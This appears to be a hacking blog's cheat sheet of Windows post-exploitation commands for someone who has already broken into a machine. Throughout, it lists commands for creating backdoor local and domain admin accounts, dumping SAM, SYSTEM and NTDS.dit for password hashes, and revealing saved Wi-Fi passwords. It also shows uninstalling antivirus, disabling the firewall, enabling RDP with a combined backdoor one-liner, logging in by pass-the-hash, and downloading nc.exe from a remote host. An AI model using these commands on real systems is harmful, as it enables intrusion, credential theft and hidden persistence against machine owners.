Once you get access to Windows machine it is important to get as much as you can to continue your hacking journey.
General commands
Here are some useful commands to execute once we are in:
whoami /all - Lists current user, sid, groups current user is a member of and their sids as well as current privilege level.
systeminfo - Outputs a large amount of data about the system, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed.
qprocess * - Much like tasklist, but a bit easier to read. It has username, login method, session id, pid, and binary name.
net config workstation - This will display information such as NetBIOS name, the full computer name, Username (of the user executing this command), Domain, Workgroups, and more.
net user test 12345678 /add - create local user called test wit password 12345678.
net localgroup administrators /add test or net localgroup administrators test /add - adds the new user test to the local administrators group.
dir /s pass == key == vnc == .config - search for keywords.
findstr /si pass *.xml *.ini *.txt - search for string.
netsh wlan show profile <SSID> key=clear - clear text pass for wifi.
System files to pull
Gets much as you can for offline analysis:
%SYSTEMDRIVE%\pagefile.sys - Large file, but contains spill over from RAM, usually lots of good information can be pulled. - Analyze this file using FTK Imager.
%SYSTEMROOT%\repair\SAM and %SYSTEMROOT%\System32\config\RegBack\SAM - Stores user passwords in either an LM hash and/or an NTLM hash format - extract hashes using samdump2samdump2 SYSTEM SAM > hashes.txtand pwdumppwdump system sam.
%SYSTEMROOT%\repair\system and %SYSTEMROOT%\System32\config\RegBack\system - This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system - same as above use samdump2 or pwdump.
%USERPROFILE%\ntuser.dat - User-level Windows registry settings - analyzes using RegRipper.
%SYSTEMROOT%\config\SAM and %SYSTEMROOT%\config\SOFTWARE and %SYSTEMROOT%\config\SECURITY and %SYSTEMROOT%\config\SYSTEM - registry hives analyze using RegRip or hivexsh.
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat - Internet Explorer web browser history file. Use the pasco tool to parse and view the contents of these files and use grep to filter the output on the date you are interested in. pasco 'index.dat' | grep ’04/28’ | less
%WINDIR%\System32\drivers\etc\hosts - System hosts file for local translation of host names to IP addresses.
Other interesting files
Of course, all files of various programs. Such as Outlook files with the .pst extension containing email messages or Keepass .kxdb files containing user passwords.
It’s best to list all installed programs and browse their folders for configuration files or files that store data from those programs. Additionally, you can search for office and text documents. Although this is an unbelievable situation, many users will still keep their passwords in .txt or .docx files on the desktop in a file e.g. called passwords.txt. [SIC!]
To list all installed software you can use PowerShell command:
You can use this for example to uninstall antivirus software.
wmic product get name /value - this gets software names
wmic product where name="software_name" call uninstall /Interactive:Off - this uninstalls software
Basic CMD
Version and Patches info
1 2 3 4 5 6
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version"#Get only that information wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches hostname DRIVERQUERY #3rd party driver vulnerable?
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
Processes, Services & Software
1 2 3 4 5 6 7 8 9
schtasks /query /fo LIST /v #Verbose out of scheduled tasks tasklist /V #List processes tasklist /SVC #links processes to started services net start#Windows Services started wmic service list brief #List services sc query #List of services dir /a "C:\Program Files"#Installed software dir /a "C:\Program Files (x86)"#Installed software reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
Domain info
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
echo %USERDOMAIN% #Get domain name echo %USERDNSDOMAIN% #Get domain name echo %logonserver% #Get name of the domain controller set logonserver #Get name of the domain controller set log #Get name of the domain controller net groups /domain #List of domain groups net group"domain computers" /domain #List of PCs connected to the domain net view /domain #Lis of PCs of the domain nltest /dclist:<DOMAIN> #List domain controllers net group"Domain Controllers" /domain #List PC accounts of domains controllers net group"Domain Admins" /domain #List users with domain admin privileges net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here) net user /domain #List all users of the domain net user <ACCOUNT_NAME> /domain #Get information about that user net accounts /domain #Password policy nltest /domain_trust #Mapping of the trust relationships.
Users
1 2 3 4 5 6 7 8 9 10 11 12
whoami /all #All info about me, take a look at the enabled tokens whoami /priv #Show only privileges net users #All users dir /b /ad "C:\Users\" net user %username% #Info about a user (me) net accounts #Information about password requirements qwinsta #Anyone else logged in? cmdkey /list #List credential net user /add [username] [password] #Create user
::Lauch new cmd.exe with new creds (to impersonate in network) runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
Groups
1 2 3 4 5 6 7 8
#Local net localgroup #All available groups net localgroup Administrators #Info about a group (admins) new localgroup administrators [username] /add #Add user to administrators
#Domain net group /domain #Info about domain groups net group /domain <domain_group_name> #Users that belongs to the group
List sessions
1 2
qwinsta klist sessions
Persistence with user
1 2 3 4 5 6 7 8 9 10 11 12
# Add domain user and put them in Domain Admins group net user username password /ADD /DOMAIN net group"Domain Admins" username /ADD /DOMAIN
# Add local user and put them local Administrators group net user username password /ADD net localgroup Administrators username /ADD
# Add user to insteresting groups: net localgroup "Remote Desktop Users" UserLoginName /add net localgroup "Debugger users" UserLoginName /add net localgroup "Power users" UserLoginName /add
netsh firewall show state # FW info, open ports netsh firewall show config # FW info Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off #Turn Off NetSh Advfirewall set allprofiles state on #Trun On netsh firewall set opmode disable #Turn Off
::How to open ports netsh advfirewall firewall add rule name="NetBIOS UDP Port 138"dir=out action=allow protocol=UDP localport=138 netsh advfirewall firewall add rule name="NetBIOS TCP Port 139"dir=in action=allow protocol=TCP localport=139 netsh firewall add portopening TCP 3389"Remote Desktop"
::Enable Remote Desktop reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh firewall add portopening TCP 3389"Remote Desktop" ::netsh firewall set service remotedesktop enable #I found that this line is not needed ::sc config TermService start= auto #I found that this line is not needed ::net start Termservice #I found that this line is not needed
::Enable Remote assistance: reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f netsh firewall set service remoteadmin enable
::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow) net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389"Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password) xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49 xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
Shares
1 2 3 4
net view #Get a list of computers net view \\computer #List shares of a computer net use x: \\computer\share #Mount the share locally net share #Check current shares
Wifi
1 2
netsh wlan show profile #AP SSID netsh wlan show profile <SSID> key=clear#Get Cleartext Pass
Copying NTDS.dit using Ntdsutil
1
ntdsutil "ac i ntds""ifm""create full c:\copy-ntds" quit quit
cd#Get current dir cd C:\path\to\dir #Change dir dir#List current dir dir /a:h C:\path\to\dir #List hidden files dir /s /b #Recursive list without shit time #Get current time date #Get current date shutdown /r /t 0#Shutdown now type <file> #Cat file
[System.Environment]::OSVersion.Version #Current OS version Get-WmiObject-query'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches Get-Hotfix-description"Security update"#List only "Security Update" patches
Other connected drives
1
Get-PSDrive | where {$_.Provider -like"Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
Users
1 2
Get-LocalUser | ft Name,Enabled,Description,LastLogon Get-ChildItem C:\Users -Force | select Name
Groups
1 2
Get-LocalGroup | ft Name #All groups Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
SUDO
1 2 3 4 5 6 7 8 9 10
#CREATE A CREDENTIAL OBJECT $pass = ConvertTo-SecureString'<PASSWORD>'-AsPlainText-Force $cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass) #CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user) Invoke-Command-Computer ARKHAM -ScriptBlock { whoami } -Credential$cred #DOWNLOAD nc.exe Invoke-Command-Computer ARKHAM -ScriptBlock { IWR-uri10.10.14.17/nc.exe -outfile nc.exe } -credential$cred Start-Process powershell -Credential$pp-ArgumentList'-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'
Clipboard
1
Get-Clipboard
Processes
1
Get-Process | where {$_.ProcessName -notlike"svchost*"} | ft ProcessName, Id
Services
1
Get-Service
Network interfaces
1 2
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress-AddressFamily IPv4 | ft
ARP
1
Get-NetNeighbor-AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State